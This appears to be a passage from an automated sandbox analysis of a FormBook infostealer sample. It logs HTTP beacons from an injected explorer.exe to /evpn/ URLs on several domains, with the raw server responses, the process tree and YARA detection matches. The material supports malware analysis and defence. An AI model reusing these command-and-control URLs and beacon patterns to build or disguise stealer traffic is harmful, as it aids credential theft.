6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72
                                                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4r


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.34972845.82.188.4080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:11.923106909 CEST1402OUTGET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.productsoffholland.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:11.952156067 CEST1403INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Content-Length: 706
                                                                        Date: Thu, 08 Apr 2021 09:10:11 GMT
                                                                        Server: LiteSpeed
                                                                        Location: https://www.productsoffholland.com/evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu
                                                                        X-Powered-By: PleskLin
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        3192.168.2.34972935.240.239.4480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:17.300426006 CEST1404OUTGET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.markmalls.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:17.568883896 CEST1405INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 09:10:17 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.markmalls.com/evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        4192.168.2.34973152.15.160.16780C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:22.820638895 CEST1472OUTGET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.zhuledao.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:22.931658030 CEST1474INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 08 Apr 2021 09:10:22 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 153
                                                                        Connection: close
                                                                        Server: nginx/1.16.1
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        5192.168.2.34973752.216.152.4380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:28.155589104 CEST5110OUTGET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.jcernadas.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:28.264857054 CEST5111INHTTP/1.1 301 Moved Permanently
                                                                        x-amz-id-2: srg1ay+sKorhhQOGuNMizeaej2IzVeRVjl1MFuHTKFT1bmsVZFO6RdEeFj/WVvZumv+oGef+d2U=
                                                                        x-amz-request-id: J17M5QFC7RV0ZT9A
                                                                        Date: Thu, 08 Apr 2021 09:10:29 GMT
                                                                        Location: http://jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu
                                                                        Content-Length: 0
                                                                        Server: AmazonS3
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        6192.168.2.349738198.185.159.14480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:38.489486933 CEST5112OUTGET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.theholisticbirthco.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:38.605370045 CEST5114INHTTP/1.1 400 Bad Request
                                                                        Cache-Control: no-cache, must-revalidate
                                                                        Content-Length: 77564
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Date: Thu, 08 Apr 2021 09:10:38 UTC
                                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                        Pragma: no-cache
                                                                        Server: Squarespace
                                                                        X-Contextid: yF5waueG/2beIt67k
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        7192.168.2.34973980.67.16.880C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:48.780775070 CEST5144OUTGET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.tor-one.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:48.808635950 CEST5144INHTTP/1.1 302 Moved Temporarily
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 09:10:48 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 154
                                                                        Connection: close
                                                                        Location: http://leere.seite
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        8192.168.2.349740188.93.150.7580C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:53.912617922 CEST5146OUTGET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.de-knutselkeet.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:53.936810970 CEST5146INHTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 08 Apr 2021 09:10:53 GMT
                                                                        Server: Apache/2.4.10
                                                                        Location: https://www.skkek.nl/wp/de-knutselkeet/
                                                                        Content-Length: 247
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 6b 6b 65 6b 2e 6e 6c 2f 77 70 2f 64 65 2d 6b 6e 75 74 73 65 6c 6b 65 65 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.skkek.nl/wp/de-knutselkeet/">here</a>.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        9192.168.2.34974345.88.202.11580C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:59.077899933 CEST5165OUTGET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.autotrafficbot.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:59.105108976 CEST5166INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 09:10:59 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.autotrafficbot.com/evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: TazxfJHRhq.exe PID: 4736 Parent PID: 5772

                                                                        General

                                                                        Start time:11:09:16
                                                                        Start date:08/04/2021
                                                                        Path:C:\Users\user\Desktop\TazxfJHRhq.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\TazxfJHRhq.exe'
                                                                        Imagebase:0x400000
                                                                        File size:207024 bytes
                                                                        MD5 hash:F818665DD48A93C48255D3CEADF92A6E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Analysis Process: TazxfJHRhq.exe PID: 5940 Parent PID: 4736

                                                                        General

                                                                        Start time:11:09:17
                                                                        Start date:08/04/2021
                                                                        Path:C:\Users\user\Desktop\TazxfJHRhq.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\TazxfJHRhq.exe'
                                                                        Imagebase:0x400000
                                                                        File size:207024 bytes
                                                                        MD5 hash:F818665DD48A93C48255D3CEADF92A6E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Analysis Process: explorer.exe PID: 3388 Parent PID: 5940

                                                                        General

                                                                        Start time:11:09:22
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: cmstp.exe PID: 4064 Parent PID: 3388

                                                                        General

                                                                        Start time:11:09:32
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\SysWOW64\cmstp.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                                        Imagebase:0x1190000
                                                                        File size:82944 bytes
                                                                        MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
